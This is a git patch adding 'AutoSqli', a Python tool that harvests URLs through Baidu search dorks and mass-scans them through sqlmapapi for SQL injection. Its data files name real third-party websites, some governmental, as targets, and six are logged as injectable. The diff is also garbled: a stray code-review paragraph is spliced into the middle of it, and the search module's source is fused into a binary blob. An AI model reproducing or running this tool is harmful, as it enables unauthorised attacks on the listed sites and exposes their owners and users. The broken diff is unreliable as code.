From 813f305db8fb23c5086487825a33517f730c5122 Mon Sep 17 00:00:00 2001
From: sowish <1546118682@qq.com>
Date: Sat, 14 Nov 2015 11:35:55 +0800
Subject: [PATCH] seconde commit
---
 AutoSqli.py | 164 ++++++++++++++++++++++++++++++++++++++++++
 README | 0
 data/injection.txt | 6 ++
 data/targets.txt | 20 ++++
 keyword.txt | 1 +
 search/__init__.py | 0
 search/__init__.pyc | Bin 0 -> 129 bytes
 search/baidu.py | 88 +++++++++++++++++++++++
 search/baidu.pyc | Bin 0 -> 3362 bytes
 set_option.txt | 172 ++++++++++++++++++++++++++++++++++++++++++++
 10 files changed, 451 insertions(+)
 create mode 100755 AutoSqli.py
 create mode 100644 README
 create mode 100755 data/injection.txt
 create mode 100755 data/targets.txt
 create mode 100755 keyword.txt
 create mode 100755 search/__init__.py
 create mode 100755 search/__init__.pyc
 create mode 100755 search/baidu.py
 create mode 100755 search/baidu.pyc
 create mode 100755 set_option.txt
diff --git a/AutoSqli.py b/AutoSqli.py
new file mode 100755
index 0000000..fb233f6
--- /dev/null
+++ b/AutoSqli.py
@@ -0,0 +1,164 @@ +#!/usr/bin/python +#-*-coding:utf-8-*- +import requests +import time +import json +import threading +import Queue +from search.baidu import * + + +class AutoSqli(object): + + """ + 使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互 + + """ + + def __init__(self, server='', target='',data = '',referer = '',cookie = ''): + super(AutoSqli, self).__init__() + self.server = server + if self.server[-1] != '/': + self.server = self.server + '/' + self.target = target + self.taskid = '' + self.engineid = '' + self.status = '' + self.data = data + self.referer = referer + self.cookie = cookie + self.start_time = time.time() + + def task_new(self): + self.taskid = json.loads( + requests.get(self.server + 'task/new').text)['taskid'] + #print 'Created new task: ' + self.taskid + if len(self.taskid) > 0: + return True + return False + + def task_delete(self): + json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text + # if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']: + # #print '[%s] Deleted task' % (self.taskid) + # return True + # return False + + def scan_start(self): + headers = {'Content-Type': 'application/json'} + print "starting to scan "+ self.target +".................." 
+ payload = {'url': self.target} + url = self.server + 'scan/' + self.taskid + '/start' + t = json.loads( + requests.post(url, data=json.dumps(payload), headers=headers).text) + self.engineid = t['engineid'] + if len(str(self.engineid)) > 0 and t['success']: + #print 'Started scan' + return True + return False + + def scan_status(self): + self.status = json.loads( + requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status'] + if self.status == 'running': + return 'running' + elif self.status == 'terminated': + return 'terminated' + else: + return 'error' + + def scan_data(self): + self.data = json.loads( + requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data'] + if len(self.data) == 0: + #print 'not injection\t' + pass + else: + f=open('data/injection.txt','a') + f.write(self.target+'\n') + print 'injection \t' + + def option_set(self): + headers = {'Content-Type': 'application/json'} + option = {"options": { + "randomAgent": True, + "tech":"BT" + } + } + url = self.server + 'option/' + self.taskid + '/set' + t = json.loads( + requests.post(url, data=json.dumps(option), headers=headers).text) + #print t + + def scan_stop(self): + json_stop=requests.get(self.server + 'scan/' + self.taskid + '/stop').text + # json.loads( + # requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success'] + + def scan_kill(self): + json_kill=requests.get(self.server + 'scan/' + self.taskid + '/kill').text + # json.loads( + # requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success'] + + def run(self): + if not self.task_new(): + return False + self.option_set() + if not self.scan_start(): + return False + while True: + if self.scan_status() == 'running': + time.sleep(10) + elif self.scan_status() == 'terminated': + break + else: + break + #print time.time() - self.start_time + if time.time() - self.start_time > 500: + error = True + self.scan_stop() + self.scan_kill() + break + self.scan_data() + self.task_delete() + 
#print time.time() - self.start_time + +class myThread(threading.Thread): + def __init__(self,q,thread_id): + threading.Thread.__init__(self) + self.q=q + self.thread_id=thread_id + def run(self): + while not self.q.empty(): + #print "threading "+str(self.thread_id)+" is running" + objects=self.q.get() + result=objects.run() + + + +if __name__ == '__main__': + urls=[] + print 'the program starts!' + key='inurl:asp?id=' + pages=3 + urls=geturl(key,pages) + #print urls + workQueue=Queue.Queue() + for tar in urls: + s = AutoSqli('http://127.0.0.1:8775', tar) + workQueue.put(s) + threads = [] + nloops = range(4) #threads Num + for i in nloops: + t = myThread(workQueue,i) + t.start() + threads.append(t) + for i in nloops: + threads[i].join() + print "Exiting Main Thread" + + + + + # t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191') + # t.run() diff --git a/README b/README new file mode 100644 index 0000000..e69de29 diff --git a/data/injection.txt b/data/injection.txt new file mode 100755 index 0000000..f2d6b7c --- /dev/null +++ b/data/injection.txt @@ -0,0 +1,6 @@ +http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248 +http://www.70jj.com/shop/index.php?shop_id=1 +http://www.cosmax.com.hk/products_detail.php?product_id=17 +http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5 +http://www.fembooks.com.tw/indexstore.php?product_id=5423 +http://www.guangzhouflower.net.cn/product.php?pid=12 diff --git a/data/targets.txt b/data/targets.txt new file mode 100755 index 0000000..77a81ea --- /dev/null +++ b/data/targets.txt 
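Review bot: `scan_data` opens `data/injection.txt` with a bare `open(..., 'a')` and never closes the handle, and it also assigns the response body to `self.data`, which `__init__` already set from the `data` constructor argument, so the attribute carries two unrelated meanings; `with open('data/injection.txt', 'a') as f: f.write(self.target + '\n')` fixes the leak, and a separate attribute such as `self.result` the collision. In `run()`, `scan_status()` is called twice per loop iteration, each a separate HTTP round trip, so a status that changes between the `'running'` and `'terminated'` checks falls into the `else: break` branch; read it once into a local, `status = self.scan_status()`, and branch on that. `task_delete`, `scan_stop` and `scan_kill` discard the response (`json_kill` and `json_stop` are never read) and the `success` checks are commented out, so a failed stop or delete is silently ignored and the task may linger on the server; the `error = True` local in `run()` is likewise never read. `myThread.run` tests `q.empty()` and then calls `q.get()`, which with four workers can block forever when another thread took the last item in between; `q.get_nowait()` wrapped in `except Queue.Empty: break` avoids the hang. With the default `server=''`, `self.server[-1]` in `__init__` raises `IndexError` before anything else runs.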
@@ -0,0 +1,20 @@ +http://www.99166.com/zjinfo.asp?id=5 +http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22 +http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205 +http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6 +http://www.juancheng.gov.cn/wsbs-view.asp?id=9285 +http://rc.sz.zj.cn/company.asp?id=4291 +http://www.law-lib.com/fxj/fxj.asp?id=940 +http://www.kfws.gov.cn/Article_read.asp?id=2289 +http://www.zjghtcm.com/new_show.asp?id=1178 +http://www.medsci.cn/sci/journal.asp?id=0bc61099 +http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15 +http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1 +http://people.rednet.cn/PeopleShow.asp?ID=2410432 +http://www.dhzsxx.com/ShowNews.asp?id=1591 +http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633 +http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05 +http://www.gxxgty.com/news_show.asp?id=1583 +http://szb.keq0475.com/Qnews.asp?ID=49506 +http://www.cyfy.cn/kssz.asp?id=42 +http://www.szkweekly.com/List.asp?ID=54284 diff --git a/keyword.txt b/keyword.txt new file mode 100755 index 0000000..3696fbf --- /dev/null +++ b/keyword.txt @@ -0,0 +1 @@ +site:.hk inurl:.php? \ No newline at end of file diff --git a/search/__init__.py b/search/__init__.py new file mode 100755 index 0000000..e69de29 
diff --git a/search/__init__.pyc b/search/__init__.pyc new file mode 100755 index 0000000000000000000000000000000000000000..1de5cdfe2919090576af51f2a34a76b34eb355b6 GIT binary patch literal 129 zcmZSn%**vFLq05-0SXv_v;zQ(Tyn zSdbZW^w+`t*B7059aEf|Sd^R*6Ca(.*)", content) #分割页面块 + #print arrList + # f2=open('content.txt','a') + # f2.write(str(arrList)+'\n')#调试使用,获取内容 + # f2.close() + for item in arrList: + regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'" + link = getMatch(regex,item) + url=link[1] #获取百度改写url + try: + domain=urllib2.Request(url) + r=random.randint(0,11) + domain.add_header('User-agent', user_agents[r]) + domain.add_header('connection','keep-alive') + response=urllib2.urlopen(domain) + uri=response.geturl() #获取真实url + urs=is_get(uri) #是否是传统的get型 + if (uri in targets) or (urs in hosts) : + continue + else: + targets.append(uri) + hosts.append(urs) + f1=open('data/targets.txt','a') #存放url链接 + f1.write(uri+'\n') + f1.close() + except: + continue + print "urls have been grabed already!!!" + return targets + + + + \ No newline at end of file 
diff --git a/search/baidu.pyc b/search/baidu.pyc new file mode 100755 index 0000000000000000000000000000000000000000..3f168e1de68db62e9d37a2a807f0d1e18775c94a GIT binary patch literal 3362 zcmbVOUvC@75#J^CU!o){ZX7j1dnOv2a;!U2G+D{A>?V$58;NA&XorEyKsfPMQ5AJwZjHZ6I4bFFL_SFHP@c^Eru#ZtL=qgb`x z3#2%RPaT^4HOflsKT}pLmWrk4%4kw0|HraT>nW@{XQhZ%pVn5ax056kb+P|`pq)y& z{FXKP72bdFWc!2bRu~+L)P)u6UMRXE($+f?{t9Wqef26fefZ9{1s(TJlQ5RxJI6(P zb@6xr)N$HK>b-nA6tcOuW3E1Ssz)YqFu48#x@bHsQc%QZ^qrk)4_fyHm&X2 z!+W%#_@W;}w4cbphiOg~AgK-LdXxz1IUDx+`3NB*kEKu=A+bwqc6oi>`cOy}#F2wx z>4y5^yd}Y7&)>A}K7LAuSNDo3CL>4AV_3D$-r5!l%b}ga0GrS*UoSKN4xyXTiOFJ;XMJtj}qL{{d#QtTWD@F*X2y3@4Iw?qC&TC%(FbPh0EcrsJHPoY?zb;P-5p?x;Iz z33FGHXzSDB;7T*xDqoS&R;gH+09#L@>&Y+-_SZ&qoFI*8GUe;(loU}j_Jx@^h-KH) znhcP_^9$smS$!zZPGadBqmoE-@DrUiV#vK+h0pQlVAF;MZ0cG7Y=kmU zCqy$tIOQF7`a8n)-H%@}s3HOx!WMw@qc>SSf_w%@lOH<;QfoYu!Z>??dg6tlLBvY{ z+7JjrLyDF-H6Ckx4FsN)F4cI0ihM~BC|oU}KM0imEl5S6Fh0ST&~p4@iUAo)joep% zK$qs&Pu|1H43if1sO`%&WM9p=w-Z2`#1SA$EH_8pJPk>qyGR|~1jdt>^nqdqAGST+ zY+nXF3?jKO#hZln&m1U&0V@Z5a*;$!x0pqfaDq0gbcE_#?x8=*QsJ$9E?+fQk+pJ0MGb}&#?|(4AV?w9Xiu6LhRK!klU&1{Y{0*NgPL!NZ0i zSYrJp)-lTP!ns8A#8{&Jc>So$IOpi`{}EdKD9`G60NsCpoofY3_w-1lSwmq{lq)@b zu)1yze$a|=;rCt#^OheRTg}i@YAb(GD(7z(>}xBx9B^;V?6vP-HA^ z;b>1H&y=lEcqrLDMg5Gj&|?>6wY_6u?F$iEE$QtG-||8#<7byIUoKD@nnNJH2wEur zgGjqnXVUv23g{YeFM{FH%f}_@9(v-m5@jeSOeeo zjBm=Na$}ZaS2}T2-rNOZ(lul5Btrf~23i;cn_;YkvDc-lXm|;fDYNSk1jB8|N~hNk z&AU{8T-x3U0#Hrhk`9z;s;p*5Y|}Nz-i*Q^I&_z54V_WA<^_>!up(`EOeF|N3Re#n z5^O!G%x!T{dbyh6Ql%)Nsaxo%T1@aa_&i@gv0oU^VYI+!c-D+B@LZ33p^3u-zuJw82&Hv1nnGUo#T literal 0 HcmV?d00001 diff --git a/set_option.txt b/set_option.txt new file mode 100755 index 0000000..0fa46a7 --- /dev/null +++ b/set_option.txt 
@@ -0,0 +1,172 @@ +{ + "options": { + "crawlDepth": null, + "osShell": false, + "getUsers": false, + "getPasswordHashes": false, + "excludeSysDbs": false, + "uChar": null, + "regData": null, + "cpuThrottle": 5, + "prefix": null, + "code": null, + "googlePage": 1, + "query": null, + "randomAgent": false, + "delay": 0, + "isDba": false, + "requestFile": null, + "predictOutput": false, + "wizard": false, + "stopFail": false, + "forms": false, + "taskid": "73674cc5eace4ac7", + "skip": null, + "dropSetCookie": false, + "smart": false, + "risk": 1, + "sqlFile": null, + "rParam": null, + "getCurrentUser": false, + "notString": null, + "getRoles": false, + "getPrivileges": false, + "testParameter": null, + "tbl": null, + "charset": null, + "trafficFile": null, + "osSmb": false, + "level": 1, + "secondOrder": null, + "pCred": null, + "timeout": 30, + "firstChar": null, + "updateAll": false, + "binaryFields": false, + "checkTor": false, + "aType": null, + "direct": null, + "saFreq": 0, + "tmpPath": null, + "titles": false, + "getSchema": false, + "identifyWaf": false, + "checkWaf": false, + "regKey": null, + "limitStart": null, + "loadCookies": null, + "dnsName": null, + "csvDel": ",", + "oDir": null, + "osBof": false, + "invalidLogical": false, + "getCurrentDb": false, + "hexConvert": false, + "answers": null, + "host": null, + "dependencies": false, + "cookie": null, + "proxy": null, + "regType": null, + "optimize": false, + "limitStop": null, + "mnemonics": null, + "uFrom": null, + "noCast": false, + "testFilter": null, + "eta": false, + "threads": 1, + "logFile": null, + "os": null, + "col": null, + "rFile": null, + "verbose": 1, + "aCert": null, + "torPort": null, + "privEsc": false, + "forceDns": false, + "getAll": false, + "api": true, + "url": null, + "invalidBignum": false, + "regexp": null, + "getDbs": false, + "freshQueries": false, + "uCols": null, + "smokeTest": false, + "pDel": null, + "wFile": null, + "udfInject": false, + "tor": false, + "forceSSL": false, + 
"beep": false, + "saveCmdline": false, + "configFile": null, + "scope": null, + "dumpAll": false, + "torType": "HTTP", + "regVal": null, + "dummy": false, + "commonTables": false, + "search": false, + "skipUrlEncode": false, + "referer": null, + "liveTest": false, + "purgeOutput": false, + "retries": 3, + "extensiveFp": false, + "dumpTable": false, + "database": "/tmp/sqlmapipc-EmjjlQ", + "batch": true, + "headers": null, + "flushSession": false, + "osCmd": null, + "suffix": null, + "dbmsCred": null, + "regDel": false, + "shLib": null, + "nullConnection": false, + "timeSec": 5, + "msfPath": null, + "noEscape": false, + "getHostname": false, + "sessionFile": null, + "disableColoring": true, + "getTables": false, + "agent": null, + "lastChar": null, + "string": null, + "dbms": null, + "tamper": null, + "hpp": false, + "runCase": null, + "osPwn": false, + "evalCode": null, + "cleanup": false, + "getBanner": false, + "profile": false, + "regRead": false, + "bulkFile": null, + "safUrl": null, + "db": null, + "dumpFormat": "CSV", + "alert": null, + "user": null, + "parseErrors": false, + "aCred": null, + "getCount": false, + "dFile": null, + "data": null, + "regAdd": false, + "ignoreProxy": false, + "getColumns": false, + "mobile": false, + "googleDork": null, + "sqlShell": false, + "pageRank": false, + "tech": "BEUSTQ", + "textOnly": false, + "commonColumns": false, + "keepAlive": false + } +}